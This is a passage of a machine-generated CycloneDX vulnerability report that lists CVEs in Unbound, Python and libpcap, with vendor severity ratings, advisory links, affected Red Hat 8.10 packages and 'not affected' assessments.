          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Temurin JVM binary is not linked against freetype library:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\nlinux-vdso.so.1 (0x0000ffff8cd00000)\nlibjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\nlibpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\nlibdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\nlibc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n/lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-11411",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        349
      ],
      "description": "NLnet Labs Unbound up to and including version 1.24.1 is vulnerable to possible domain hijack attacks. Promiscuous NS RRSets that complement positive DNS replies in the authority section can be used to trick resolvers to update their delegation information for the zone. Usually these RRSets are used to update the resolver's knowledge of the zone's name servers. A malicious actor can exploit the possible poisonous effect by injecting NS RRSets (and possibly their respective address records) in a reply. This could be done for example by trying to spoof a packet or fragmentation attacks. Unbound would then proceed to update the NS RRSet data it already has since the new data has enough trust for it, i.e., in-zone data for the delegation point. Unbound 1.24.1 includes a fix that scrubs unsolicited NS RRSets (and their respective address records) from replies mitigating the possible poison effect. Unbound 1.24.2 includes an additional fix that scrubs unsolicited NS RRSets (and their respective address records) from YXDOMAIN and non-referral nodata replies, further mitigating the possible poison effect.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11411"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/11/26/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18556"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18931"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11411"
        },
        {
          "url": "https://bugzilla.redhat.com/2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/2405706"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405706"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11411"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18556.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-11411.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18931.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/11/msg00008.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/11/msg00032.html"
        },
        {
          "url": "https://nlnetlabs.nl/news/2025/Nov/26/unbound-1.24.2-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11411"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7855-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7855-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11411"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2025-11411.txt"
        }
      ],
      "published": "2025-10-22T13:15:29+00:00",
      "updated": "2026-06-17T08:30:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-11468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11468"
        },
        {
          "url": "https://github.com/python/cpython/commit/003b8315669b9f08b1010a49071f73f15f818094"
        },
        {
          "url": "https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2"
        },
        {
          "url": "https://github.com/python/cpython/commit/61614a5e5056e4f61ced65008d4576f3df34acb6"
        },
        {
          "url": "https://github.com/python/cpython/commit/a76e4cd62dd68e7cbe86e37e6ed988495a646b66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e9970f077240c7c670e8a6fc6662f2b30d3b6ad0"
        },
        {
          "url": "https://github.com/python/cpython/commit/f738386838021c762efea6c9802c82de65e87796"
        },
        {
          "url": "https://github.com/python/cpython/issues/143935"
        },
        {
          "url": "https://github.com/python/cpython/pull/143936"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11468"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:30:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-11961",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 1.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        122,
        126
      ],
      "description": "pcap_ether_aton() is an auxiliary function in libpcap, it takes a string argument and returns a fixed-size allocated buffer.  The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented.  If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-11961"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-11961"
        },
        {
          "url": "https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11961"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
        }
      ],
      "published": "2025-12-31T01:15:54+00:00",
      "updated": "2026-06-17T08:31:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14",
          "versions": [
            {
              "version": "14:1.9.1-5.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libpcap@1.9.1-5.el8?arch=x86_64&distro=redhat-8.10&epoch=14"
        },
        {
